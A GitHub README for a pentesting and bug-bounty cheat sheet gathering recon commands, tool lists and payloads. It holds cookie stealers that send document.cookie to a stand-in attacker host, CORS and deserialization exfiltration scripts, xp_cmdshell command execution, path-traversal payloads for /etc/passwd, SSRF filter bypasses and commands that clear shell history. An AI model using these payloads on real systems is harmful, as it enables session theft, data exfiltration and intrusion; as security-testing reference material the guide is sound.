Giters

Bvaudin / easyg

Here I gather all the resources about PenTesting and Bug Bounty Hunting that I find interesting

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

███████╗ █████╗ ███████╗██╗   ██╗ ██████╗
██╔════╝██╔══██╗██╔════╝╚██╗ ██╔╝██╔════╝
█████╗  ███████║███████╗ ╚████╔╝ ██║  ███╗
██╔══╝  ██╔══██║╚════██║  ╚██╔╝  ██║   ██║
███████╗██║  ██║███████║   ██║   ╚██████╔╝
╚══════╝╚═╝  ╚═╝╚══════╝   ╚═╝    ╚═════╝
Made with <3 by Riccardo Malatesta (@seeu)

License Twitter Open Source Love

EasyG started out as a script that I use to automate some information gathering tasks for PenTesting and Bug Hunting, you can find it here. Now it's more than that.

Here I gather all the resources about PenTesting and Bug Bounty Hunting that I find interesting: notes, payloads and links.

Index

Blog / Writeups / News & more

Safety tips

  • For RCE
    • Never upload a shell at first, you can be banned from a program. Just execute a whoami as a PoC, proceed with a shell if required/allowed.
  • For stored XSS
    • console.log() is better than alert(), it makes less noise especially for stored XSS.
  • For SQLi
    • Don't dump the entire db, you can be banned from a program. Just retrieve the db's name, version and/or other minor infos. Proceed with db dump only if required/allowed;
    • Don't use tautologies like OR 1=1, it can end up in a delete query or something dangerous. It's better to use AND SLEEP(5) or te'+'st.
  • For subdomain takeovers
    • use as a PoC an html page like:
      9a69e2677c39cdae365b49beeac8e059.html 
      <!-- PoC by seeu -->

Check-lists

Risk markers

  • Copyright 1995
  • Server: Apache 2.2
  • Expider SSL Certificate
  • "Internal" in hostname
  • Shodan returns CVEs
  • Nuclei template matches

Testing layers

  • Integrations
  • Application Libraries (usually JavaScript)
  • Application: Custom Code or COTS
  • Application Framework
  • Web Hosting Software (Default creds, Web server misconfigurations, web exploits)
  • Open Ports and Services (Default creds on services, service level exploits)

Bug bounty

Multiple targets

  • Run EasyG assetenum + take screenshots or open results in firefox
  • Select the interesting targets, see Risk markers

Single target

Upload Functions check-list

  • Integrations (from 3rd party)
    • XSS
  • Self Uploads
    • XML based (Docs/PDF)
      • SSRF, XSS
    • Image
      • XSS, Shell
        • Name
        • Binary header
        • Metadata
  • Where is data stored?

Content Discovery

Some tips

  • If the application is ASP.NET, search for Appsettings.json
  • Use recursion. If you encounter a 401 response, search with waybackmachine
  • Search for past reports in the same program

Check the tech of a target with

Tools

Wordlists

To find more endpoints

Google Dorking

  • ext: to search for: php, php3, aspx, asp, jsp, xhtml, phtml, html, xsp, nsf, form;
  • Search also for pdf, xlsx and similar, they may contain some infos;
  • site: to target a website and its subdomains;
  • inurl:& to search for parameters;
  • intitle: to search interesting pages like admin, register, login etc.
  • Dorking on Steroids
  • "Seeing something unexpected? Take a look at the GitHub profile guide." "COMPANY-TARGET" site:http://github.com [Reference]
  • dorks_hunter

GitHub Dorking

  • sensitive words: password, api_key, access_key, dbpassword, dbuser, pwd, pwds, aws_access, key, token, credentials, pass, pwd, passwd, private, preprod, appsecret
  • languages: json, bash, shell, java etc., example HEROKU_API_KEY language:json
  • extensions: extensions: bat, config, ini, env etc.
  • filename: netrpc, .git-credentials, .history, .htpasswd, bash_history
  • Other dorks

Tools

For a temporary public server

For auths

  • textverified.com for auths requiring a phone number
  • temp-mail.org
  • To have multiple email adresses using gmail, you can add a + sign after your email's alias. For example: if your email is janedoe@gmail.com and you sign up for Twitter you can sign up using janedoe+twitter@gmail.com. [Reference]

To find parameters

Asset enumeration/discovery

  • nmap
    • Discover everything + services nmap -p 1-65535 -sV -T4 -Pn -n -vv -iL target.txt -oX out.xml
  • bgp.he.net to find ASN + amass intel -asn <ASN>
  • crt.sh
    • Crtsh-Fetcher
    • To find new domains cat json.txt | jq -r '.[].common_name' | sed 's/\*//g' | sort -u | rev | cut -d "." -f 1,2 | rev | sort -u | tee out.txt
  • naabu
    • Discover everything faster naabu -l 1.txt -v -p - -exclude-ports 80,443,81,3000,3001,8000,8080,8443 -c 1000 -rate 7000 -stats -o 1_o.txt
  • gobuster + all.txt by jhaddix
  • dnsx
    • Reverse DNS lookup cat ip.txt | dnsx -ptr -resp-only
  • VhostScan to discover virtual hosts

To find vulnerabilities

  • Tplmap for SSTI exploitation
  • CSRF PoC Generator
  • BruteSpray python brutespray.py --file nmap.xml --threads 5 --hosts 5
  • cmd.aspx
  • SearchSploit Port services vulnerability checks
  • nuclei
    • Automatic Selection nuclei -u http://target.io -as
    • Check for Exposed panels %USERPROFILE%\nuclei-templates\exposed-panels
    • Check for Technologies %USERPROFILE%\nuclei-templates\technologies
    • Check for more -t %USERPROFILE%\nuclei-templates\misconfiguration -t %USERPROFILE%\nuclei-templates\cves -t %USERPROFILE%\nuclei-templates\cnvd
    • Use it in a workflow cat subdomains.txt | httpx | nuclei -t technologies
    • nuclei geeknik
  • CMSeeK CMS Detection & Exploitation Suite
  • ppfuzz a fast tool to scan client-side prototype pollution vulnerability

Decompilers

Desktop Application / Thick Client Penetration Testing

  • testssl.sh useful for checking outdated ciphers & co.
  • Process Hacker It helps to dump the exe memory and see what sensitive data is there
  • Echo Mirage to monitor the network interactions of an application
  • Wireshark
  • Sigcheck check the signature of an executable

Android

  • adb it is used to debug an android device
  • HTTP Toolkit to see requests on a non-rooted or emulated device, as an alternative to burp suite
  • Genymotion an android emulator
  • Android Studio Android application development, useful also for the emulator
    • Note: to start only the emulator, use commands such as 
      cd C:\Users\Riccardo\AppData\Local\Android\Sdk\emulator
emulator -avd Pixel_4_XL_API_30

For Reporting

Other

Used in easyg.rb

  • amass
  • subfinder
  • github-subdomains
  • crt.sh
  • httprobe
    • type subs.txt | httprobe -p http:81 -p http:3000 -p https:3000 -p http:3001 -p https:3001 -p http:8000 -p http:8080 -p https:8443 -c 150 > out.txt
  • anew
  • naabu
    • naabu -v -list subs.txt -exclude-ports 80,443,81,3000,3001,8000,8080,8443 -stats -o out.txt
  • gospider
  • hakrawler
  • Selenium
  • nuclei
    • nuclei -l httprobe_results.txt -t %USERPROFILE%\nuclei-templates\takeovers -t %USERPROFILE%\nuclei-templates\exposures\configs\git-config.yaml -o out.txt

Burp suite

To add a domain + subdomains in advanced scopes: ^(.*\.)?test\.com$

Cool extensions:

Network

ip route add <net_address_in_cdr> via <interface_gateway>
route add <net_address_in_cdr> mask <net_address_mask_in_cdr> <interface_gateway> (Windows)
nmap -sn <net_address_in_cdr> | Check hosts alive, adding -A you gather more info for a target

Linux

Linux Commands

netstat -tulpn                                        Show Linux network ports with process ID’s (PIDs)
watch ss -stplu                                       Watch TCP, UDP open ports in real time with socket summary.
lsof -i                                               Show established connections.
macchanger -m MACADDR INTR                            Change MAC address on KALI Linux.
ifconfig eth0 192.168.2.1/24                          Set IP address in Linux.
ifconfig eth0:1 192.168.2.3/24                        Add IP address to existing network interface in Linux.
ifconfig eth0 hw ether MACADDR                        Change MAC address in Linux using ifconfig.
ifconfig eth0 mtu 1500                                Change MTU size Linux using ifconfig, change 1500 to your desired MTU.
dig -x 192.168.1.1                                    Dig reverse lookup on an IP address.
host 192.168.1.1                                      Reverse lookup on an IP address, in case dig is not installed.
dig @192.168.2.2 domain.com -t AXFR                   Perform a DNS zone transfer using dig.
host -l domain.com nameserver                         Perform a DNS zone transfer using host.
nbtstat -A x.x.x.x                                    Get hostname for IP address.
ip addr add 192.168.2.22/24 dev eth0                  Adds a hidden IP address to Linux, does not show up when performing an ifconfig.
tcpkill -9 host google.com                            Blocks access to google.com from the host machine.
echo \"1\" > /proc/sys/net/ipv4/ip_forward              Enables IP forwarding, turns Linux box into a router – handy for routing traffic through a box.
echo \"8.8.8.8\" > /etc/resolv.conf                     Use Google DNS.

Linux User Management

whoami                                                Shows currently logged in user on Linux.
id                                                    Shows currently logged in user and groups for the user.
last                                                  Shows last logged in users.
mount                                                 Show mounted drives.
df -h                                                 Shows disk usage in human readable output.
echo \"user:passwd\" | chpasswd                         Reset password in one line.
getent passwd                                         List users on Linux.
strings /usr/local/bin/blah                           Shows contents of none text files, e.g. whats in a binary.
uname -ar                                             Shows running kernel version.
PATH=$PATH:/my/new-path                               Add a new PATH, handy for local FS manipulation.
history                                               Show bash history, commands the user has entered previously.

Linux File Commands

df -h blah                                            Display size of file / dir Linux.
diff file1 file2                                      Compare / Show differences between two files on Linux.
md5sum file                                           Generate MD5SUM Linux.
md5sum -c blah.iso.md5                                Check file against MD5SUM on Linux, assuming both file and .md5 are in the same dir.
file blah                                             Find out the type of file on Linux, also displays if file is 32 or 64 bit.
dos2unix                                              Convert Windows line endings to Unix / Linux.
base64 < input-file > output-file                     Base64 encodes input file and outputs a Base64 encoded file called output-file.
base64 -d < input-file > output-file                  Base64 decodes input file and outputs a Base64 decoded file called output-file.
touch -r ref-file new-file                            Creates a new file using the timestamp data from the reference file, drop the -r to simply create a file.
rm -rf                                                Remove files and directories without prompting for confirmation.

Misc Commands

init 6                                                Reboot Linux from the command line.
gcc -o output.c input.c                               Compile C code.
gcc -m32 -o output.c input.c                          Cross compile C code, compile 32 bit binary on 64 bit Linux.
unset HISTORYFILE                                     Disable bash history logging.
rdesktop X.X.X.X                                      Connect to RDP server from Linux.
kill -9 $$                                            Kill current session.
chown user:group blah                                 Change owner of file or dir.
chown -R user:group blah                              Change owner of file or dir and all underlying files / dirs – recersive chown.
chmod 600 file                                        Change file / dir permissions, see [Linux File System Permissons](#linux-file-system-permissions) for details.
ssh user@X.X.X.X | cat /dev/null > ~/.bash_history    Clear bash history

Linux File System Permissions

777 rwxrwxrwx                                         No restriction, global WRX any user can do anything.
755 rwxr-xr-x                                         Owner has full access, others can read and execute the file.
700 rwx------                                         Owner has full access, no one else has access.
666 rw-rw-rw-                                         All users can read and write but not execute.
644 rw-r--r--                                         Owner can read and write, everyone else can read.
600 rw-------                                         Owner can read and write, everyone else has no access.

Linux Directories

/                                                     / also know as “slash” or the root.
/bin                                                  Common programs, shared by the system, the system administrator and the users.
/boot                                                 Boot files, boot loader (grub), kernels, vmlinuz
/dev                                                  Contains references to system devices, files with special properties.
/etc                                                  Important system config files.
/home                                                 Home directories for system users.
/lib                                                  Library files, includes files for all kinds of programs needed by the system and the users.
/lost+found                                           Files that were saved during failures are here.
/mnt                                                  Standard mount point for external file systems.
/media                                                Mount point for external file systems (on some distros).
/net                                                  Standard mount point for entire remote file systems – nfs.
/opt                                                  Typically contains extra and third party software.
/proc                                                 A virtual file system containing information about system resources.
/root                                                 root users home dir.
/sbin                                                 Programs for use by the system and the system administrator.
/tmp                                                  Temporary space for use by the system, cleaned upon reboot.
/usr                                                  Programs, libraries, documentation etc. for all user-related programs.
/var                                                  Storage for all variable files and temporary files created by users, such as log files, mail queue,
                                                      print spooler. Web servers, Databases etc.

Linux Interesting Files / Directories

/etc/passwd                                           Contains local Linux users.
/etc/shadow                                           Contains local account password hashes.
/etc/group                                            Contains local account groups.
/etc/init.d/                                          Contains service init script – worth a look to see whats installed.
/etc/hostname                                         System hostname.
/etc/network/interfaces                               Network interfaces.
/etc/resolv.conf                                      System DNS servers.
/etc/profile                                          System environment variables.
~/.ssh/                                               SSH keys.
~/.bash_history                                       Users bash history log.
/var/log/                                             Linux system log files are typically stored here.
/var/adm/                                             UNIX system log files are typically stored here.
/var/log/apache2/access.log                           Apache access log file typical path.
/var/log/httpd/access.log                             Apache access log file typical path.
/etc/fstab                                            File system mounts.

Web vulnerabilities

XSS

Tools

CSP bypass

Bypasses

Swagger XSS

CRLF injection [Reference]

  • /%0D%0AX-XSS-Protection%3A%200%0A%0A%3cscript%3ealert(document.domain)%3c%2fscript%3e%3c!--
  • /%E5%98%8D%E5%98%8AX-XSS-Protection%3A%200%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%3cscript%3ealert(document.domain)%3c%2fscript%3e%3c!--
  • Nuclei template %USERPROFILE%\nuclei-templates\vulnerabilities\generic\crlf-injection.yaml

Cross Site Tracing

Blind XSS

  • Insert a payload in the User-Agent, try with the match/replace rule
  • Other endpoints: pending review comments, feedback

DoS

  • %22%27%22%3E%3CMETA%20HTTP-EQUIV%3Drefresh%20CONTENT%3D1%3E%3F%3D This could lead the page to refresh quickly and infinitely causing being blocked by a WAF and being a potential DoS.

Payloads

  • HTML inj 
    <p style="color:red">ERROR! Repeat the login</p>Membership No.<br/><input><br/><a href=http://evil.com><br><input type=button value="Login"></a><br/><img src=http://evil.com style="visibility:hidden">
  • iframe + base64 encoded SVG 
    <iframe src="data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBzdGFuZGFsb25lPSJubyI/Pgo8IURPQ1RZUEUgc3ZnIFBVQkxJQyAiLS8vVzNDLy9EVEQgU1ZHIDEuMS8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9HcmFwaGljcy9TVkcvMS4xL0RURC9zdmcxMS5kdGQiPgoKPHN2ZyB2ZXJzaW9uPSIxLjEiIGJhc2VQcm9maWxlPSJmdWxsIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPgogICA8cmVjdCB3aWR0aD0iMzAwIiBoZWlnaHQ9IjEwMCIgc3R5bGU9ImZpbGw6cmdiKDAsMCwyNTUpO3N0cm9rZS13aWR0aDozO3N0cm9rZTpyZ2IoMCwwLDApIiAvPgogICA8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+CiAgICAgIGFsZXJ0KGRvY3VtZW50LmRvbWFpbik7CiAgICAgIGFsZXJ0KGRvY3VtZW50LmNvb2tpZSk7CiAgIDwvc2NyaXB0Pgo8L3N2Zz4="></iframe>
  • Cookie stealers 
    • fetch('https://ATTACKER-WEBSITE', {method: 'POST',mode: 'no-cors',body:document.cookie});
    • document.write('<img src=\"http://ATTACKER-WEBSITE/?cookie=' + document.cookie + '\" />')
    • <img src=x onerror=this.src='http://ATTACKER-WEBSITE/?'+document.cookie;>

SQLi

Tools

 > SQLMap: sqlmap -u https://vulnerable/index.php?id=1
                  --tables (to see db)
                  -D DATABASE_NAME -T TABLE_NAME --dump (to see data)
                  --forms --batch --crawl=10 --random-agent --level=5 --risk=3 (to crawl)

RCE

EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
xp_cmdshell 'COMMAND';
EXEC sp_configure 'allow updates', 0
RECONFIGURE
EXEC sp_configure 'show advanced options', 1
GO
RECONFIGURE
GO
EXEC sp_configure 'xp_cmdshell', 1
GO
RECONFIGURE
GO
xp_cmdshell 'COMMAND';

SSRF

SSRF with blacklist-based input filters bypass: Some applications block input containing hostnames like 127.0.0.1 and localhost, or sensitive URLs like /admin. In this situation, you can often circumvent the filter using various techniques:

  • Using an alternative IP representation of 127.0.0.1, such as 2130706433, 017700000001, or 127.1;
  • Registering your own domain name that resolves to 127.0.0.1. You can use spoofed.burpcollaborator.net for this purpose or the domain firefox.fr is a DNS that point to 127.0.0.1.;
  • Obfuscating blocked strings using URL encoding or case variation.

SSRF with whitelist-based input filters bypass

  • You can embed credentials in a URL before the hostname, using the @ character. For example: https://expected-host@evil-host.
  • You can use the # character to indicate a URL fragment. For example: https://evil-host#expected-host.
  • You can leverage the DNS naming hierarchy to place required input into a fully-qualified DNS name that you control. For example: https://expected-host.evil-host.
  • You can URL-encode characters to confuse the URL-parsing code. This is particularly useful if the code that implements the filter handles URL-encoded characters differently than the code that performs the back-end HTTP request.
  • You can use combinations of these techniques together.

Other tips

Burp extensions

Authentication vulnerabilities

  • Multi-factor authentication
    • Try to intercept the response and modify the status to 200;
    • Bruteforce.
  • Password reset
    • Change the Host with the host of your server. The request for a password reset might use the Host value for the link with the reset token;
    • Try with headers like X-Forwarded-Host:.
  • Password change
  • Keeping users logged in

Access control vulnerabilities and privilege escalation

In the context of web applications, access control is dependent on authentication and session management:

  • Authentication identifies the user and confirms that they are who they say they are;
  • Session management identifies which subsequent HTTP requests are being made by that same user;
  • Access control determines whether the user is allowed to carry out the action that they are attempting to perform.

From a user perspective, access controls can be divided into the following categories:

  • Vertical access controls Mechanisms that restrict access to sensitive functionality that is not available to other types of users
  • Horizontal access controls Mechanisms that restrict access to resources to the users who are specifically allowed to access those resources
  • Context-dependent access controls Restrict access to functionality and resources based upon the state of the application or the user's interaction with it

Tools

Directory Traversal

  • simple case https://insecure-website.com/loadImage?filename=..\..\..\windows\win.ini
  • absolute path https://insecure-website.com/loadImage?filename=/etc/passwd
  • stripped non-recursively https://insecure-website.com/loadImage?filename=....//....//....//etc/passwd
  • superfluous URL-decode https://insecure-website.com/loadImage?filename=..%252f..%252f..%252fetc/passwd
  • validation of start of path https://insecure-website.com/loadImage?filename=/var/www/images/../../../etc/passwd
  • validation of start of path https://insecure-website.com/loadImage?filename=../../../etc/passwd%00.png

Business logic vulnerabilities

Examples:

  • Excessive trust in client-side controls
  • 2FA broken logic
  • Failing to handle unconventional input
  • Inconsistent security controls
  • Weak isolation on dual-use endpoint
  • Password reset broken logic
  • Insufficient workflow validation
  • Flawed enforcement of business rules
  • Authentication bypass via encryption oracle

CORS

Classic CORS vulnerability

<script>
  var req = new XMLHttpRequest();
  req.onload = reqListener;
  req.open('get','$url/accountDetails',true);
  req.withCredentials = true;
  req.send();
  function reqListener() {
  location='/log?key='+this.responseText;
  };
</script>

CORS vulnerability with null origin

<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html,<script>
  var req = new XMLHttpRequest();
  req.onload = reqListener;
  req.open('get','vulnerable-website.com/sensitive-victim-data',true);
  req.withCredentials = true;
  req.send();
     
  function reqListener() {
  location='malicious-website.com/log?key='+this.responseText;
  };</script>">
</iframe>

CORS vulnerability with trusted insecure protocols

<script>
  document.location="http://stock.$your-lab-url/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://$your-lab-url/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://$exploit-server-url/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>

Tools

  • Corsy Corsy is a lightweight program that scans for all known misconfigurations in CORS implementations

Deserialization

Ysoserial

Because of Runtime.exec(), ysoserial doesn't work well with multiple commands. After some research, I found a way to run multiple sys commands anyway, by using sh -c $@|sh . echo before the multiple commands that we need to run. Here I needed to run the command host and whoami:

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections7 'sh -c $@|sh . echo host $(whoami).<MY-'RATOR-ID>.burpcollaborator.net' | gzip | base64

PHPGGC is a library of unserialize() payloads along with a tool to generate them, from command line or programmatically.

Burp extensions:

HTTP Host header attacks

  • "If someone sends a cookie called '0', automattic.com responds with a list of all 152 cookies supported by the application: curl -v -H 'Cookie: 0=1' https://automattic.com/?cb=123 | fgrep Cookie" [Reference];
  • CRLF injection [Reference], "When you find response header injection, you can probably do better than mere XSS or open-redir. Try injecting a short Content-Length header to cause a reverse desync and exploit random live users." [Reference]

Abusing S3 Bucket Permissions

Target example: http://[name_of_bucket].s3.amazonaws.com

Read Permission

  • aws s3 ls s3://[name_of_bucket] --no-sign-request
  • aws s3 ls s3://pyx-pkgs --recursive --human-readable --summarize

Write Permission

  • aws s3 cp localfile s3://[name_of_bucket]/test_file.txt –-no-sign-request

READ_ACP

  • aws s3api get-bucket-acl --bucket [bucketname] --no-sign
  • aws s3api get-object-acl --bucket [bucketname] --key index.html --no-sign-request

WRITE_ACP

  • aws s3api put-bucket-acl --bucket [bucketname] [ACLPERMISSIONS] --no-sign-request
  • aws s3api put-object-acl --bucket [bucketname] --key file.txt [ACLPERMISSIONS] --no-sign-request

Tools

Resources

GraphQL

To analyze the schema: vangoncharov.github.io/graphql-voyager/ or InQL for Burp Suite.

GraphQL Introspection query

{"query": "{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"}

{query: __schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}

{"operationName":"IntrospectionQuery","variables":{},"query":"query IntrospectionQuery {\n  __schema {\n    queryType {\n      name\n    }\n    mutationType {\n      name\n    }\n    subscriptionType {\n      name\n    }\n    types {\n      ...FullType\n    }\n    directives {\n      name\n      description\n      locations\n      args {\n        ...InputValue\n      }\n    }\n  }\n}\n\nfragment FullType on __Type {\n  kind\n  name\n  description\n  fields(includeDeprecated: true) {\n    name\n    description\n    args {\n      ...InputValue\n    }\n    type {\n      ...TypeRef\n    }\n    isDeprecated\n    deprecationReason\n  }\n  inputFields {\n    ...InputValue\n  }\n  interfaces {\n    ...TypeRef\n  }\n  enumValues(includeDeprecated: true) {\n    name\n    description\n    isDeprecated\n    deprecationReason\n  }\n  possibleTypes {\n    ...TypeRef\n  }\n}\n\nfragment InputValue on __InputValue {\n  name\n  description\n  type {\n    ...TypeRef\n  }\n  defaultValue\n}\n\nfragment TypeRef on __Type {\n  kind\n  name\n  ofType {\n    kind\n    name\n    ofType {\n      kind\n      name\n      ofType {\n        kind\n        name\n        ofType {\n          kind\n          name\n          ofType {\n            kind\n            name\n            ofType {\n              kind\n              name\n              ofType {\n                kind\n                name\n              }\n            }\n          }\n        }\n      }\n    }\n  }\n}\n"}

WordPress

  • Information Disclosure [high]: /_wpeprivate/config.json
  • Data exposure:
    • /wp-json/wp/v2/users/
    • /wp-json/th/v1/user_generation
    • /?rest_route=/wp/v2/users
  • xmlrpc.php enabled, reference. Send a post request to this endpoint with a body like this: 
    <?xml version="1.0" encoding="utf-8"?>
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
  • Use Nuclei to detect WordPress websites from a list of targets with: nuclei -l subdomains.txt -t %USERPROFILE%/nuclei-templates/technologies/wordpress-detect.yaml
  • Scan with WPScan github.com/wpscanteam/wpscan with: wpscan --url <domain> --api-token <your-api-token>

Resources

IIS - Internet Information Services

  • Wordlist iisfinal.txt
  • Check if trace.axd is enabled
  • Other common files
  • Search for 
    Views/web.config
bin/WebApplication1.dll
System.Web.Mvc.dll
System.Web.Mvc.Ajax.dll
System.Web.Mvc.Html.dll
System.Web.Optimization.dll
System.Web.Routing.dll

Reference: https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/iis-internet-information-services

Lotus Domino

Git source code exposure

Once you have the source code, look for the secrets within the files.

Tools

  • DotGit find if a website has .git exposed
  • nuclei template %USERPROFILE%\nuclei-templates\exposures\configs\git-config.yaml
  • GitDumper from GitTools

Subdomain takeover

Tools

Thick client vulnerabilities

DLL Hijacking

Tools

  • Process Monitor to see which DLLs are missing for an exe and do DLL Hijacking

Using Process Monitor, set the filters to find missing dlls.

procmon-config

After that, insert the dll in the position of the missing ones with the same name. An example of a dll:

#include <windows.h>

BOOL WINAPI DllMain(HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
    switch (dwReason)
    {
    case DLL_PROCESS_ATTACH:
        MessageBox(NULL,
            "success!!",
            "pwned",
            MB_ICONERROR | MB_OK
        );
        break;
    }

    return TRUE;
}

Resources

About

Here I gather all the resources about PenTesting and Bug Bounty Hunting that I find interesting

License:GNU General Public License v3.0

Languages

Language:Ruby 82.8%Language:Python 8.3%Language:PHP 6.9%Language:HTML 1.2%Language:Shell 0.8%Language:JavaScript 0.2%